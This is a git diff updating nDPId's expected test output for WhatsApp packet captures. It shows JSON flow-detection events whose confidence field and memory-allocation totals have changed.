00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1432820693846,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820693846,"pkt":"ABoRAAACABoRAAABCABFAAAoY3pAAEAGKTEKCAABnlUFx8lyAbsu9\/Nt0QgMlFAQOQj9dwAA"} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":238,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820693796,"flow_last_seen":1432820694164,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432820694164,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.5.199","src_port":51570,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1432820693796,"flow_last_seen":1432820695137,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":742,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.5.199","src_port":51570,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1432820624900,"flow_last_seen":1432820633508,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":968,"flow_tot_l4_payload_len":3069,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.42","src_port":44819,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1432820558921,"flow_last_seen":1432820572412,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":2486,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"184.173.179.46","src_port":35480,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00701{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1432820633802,"flow_last_seen":1432820681629,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":505,"flow_tot_l4_payload_len":2241,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.192.222.189","src_port":42241,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820568947,"flow_last_seen":1432820628171,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.252.121.1","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820569427,"flow_last_seen":1432820629171,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"179.60.192.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820570876,"flow_last_seen":1432820631171,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.93.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820570006,"flow_last_seen":1432820630172,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.79.192","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1432820571488,"flow_last_seen":1432820632171,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":806,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.73.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820568346,"flow_last_seen":1432820627171,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.64.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820567917,"flow_last_seen":1432820626171,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.74.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820567259,"flow_last_seen":1432820625171,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.84.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1432820681899,"flow_last_seen":1432820691973,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":254,"flow_tot_l4_payload_len":1783,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.109","src_port":49721,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":238,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820693796,"flow_last_seen":1432820694164,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432820694164,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.5.199","src_port":51570,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1432820693796,"flow_last_seen":1432820695137,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":742,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.5.199","src_port":51570,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1432820624900,"flow_last_seen":1432820633508,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":968,"flow_tot_l4_payload_len":3069,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.42","src_port":44819,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1432820558921,"flow_last_seen":1432820572412,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":2486,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"184.173.179.46","src_port":35480,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00701{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1432820633802,"flow_last_seen":1432820681629,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":505,"flow_tot_l4_payload_len":2241,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.192.222.189","src_port":42241,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820568947,"flow_last_seen":1432820628171,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.252.121.1","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820569427,"flow_last_seen":1432820629171,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"179.60.192.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820570876,"flow_last_seen":1432820631171,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.93.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820570006,"flow_last_seen":1432820630172,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.79.192","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1432820571488,"flow_last_seen":1432820632171,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":806,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.73.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820568346,"flow_last_seen":1432820627171,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.64.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820567917,"flow_last_seen":1432820626171,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.74.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820567259,"flow_last_seen":1432820625171,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.84.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1432820681899,"flow_last_seen":1432820691973,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":254,"flow_tot_l4_payload_len":1783,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.109","src_port":49721,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00582{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","packets-captured":261,"packets-processed":261,"total-skipped-flows":0,"total-l4-payload-len":14389,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":13,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":13,"total-idle-flows":13,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":81,"global_ts_msec":1432820695137} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 261/261 @@ -87,9 +87,9 @@ ~~ total active/idle flows...: 13/13 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5908180 bytes -~~ total memory freed........: 5908180 bytes -~~ total allocations/frees...: 118430/118430 +~~ total memory allocated....: 6041814 bytes +~~ total memory freed........: 6041814 bytes +~~ total allocations/frees...: 121192/121192 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 472 chars ~~ json string max len.......: 711 chars diff --git a/test/results/whatsappfiles.pcap.out b/test/results/whatsappfiles.pcap.out index 258181185..5c734de54 100644 --- a/test/results/whatsappfiles.pcap.out +++ b/test/results/whatsappfiles.pcap.out @@ -4,17 +4,17 @@ 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1519924083411,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1519924083411,"pkt":"XEl5dU5qkLkxKPrKCABFAABAAABAAEAG5oDAqAIduTzYNcIKAbs8JoRvAAAAALDC\/\/8eywAAAgQFtAEDAwYBAQgKKOUV+QAAAAAEAgAA"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1519924083501,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1519924083501,"pkt":"kLkxKPrKXEl5dU5qCABFAAA8AABAAFUG0YS5PNg1wKgCHQG7wgonNGFZPCaEcKASbTj4zgAAAgQFggQCCAoJITj5KOUV+QEDAwg="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1519924083503,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1519924083503,"pkt":"XEl5dU5qkLkxKPrKCABFAAA0AABAAEAG5ozAqAIduTzYNcIKAbs8JoRwJzRhWoAQCAWMQgAAAQEICijlFlQJITj5"} -00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1519924083411,"flow_last_seen":1519924083506,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1519924083506,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"107144b88827da5da9ed42d8776ccdc5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1519924083411,"flow_last_seen":1519924083598,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":1641,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1519924083598,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"107144b88827da5da9ed42d8776ccdc5","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -01333{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1519924083411,"flow_last_seen":1519924083599,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":3451,"flow_avg_l4_payload_len":431,"midstream":0,"thread_ts_msec":1519924083599,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","server_names":"*.cdn.whatsapp.net,*.snr.whatsapp.net,*.whatsapp.com,*.whatsapp.net,whatsapp.com,whatsapp.net","ja3":"107144b88827da5da9ed42d8776ccdc5","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=Menlo Park, O=Facebook, Inc., CN=*.whatsapp.net","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"10:54:EB:4A:A2:2A:42:2F:A6:1C:E7:9C:F4:84:10:7E:30:2E:56:BB"}} +00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1519924083411,"flow_last_seen":1519924083506,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1519924083506,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"107144b88827da5da9ed42d8776ccdc5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 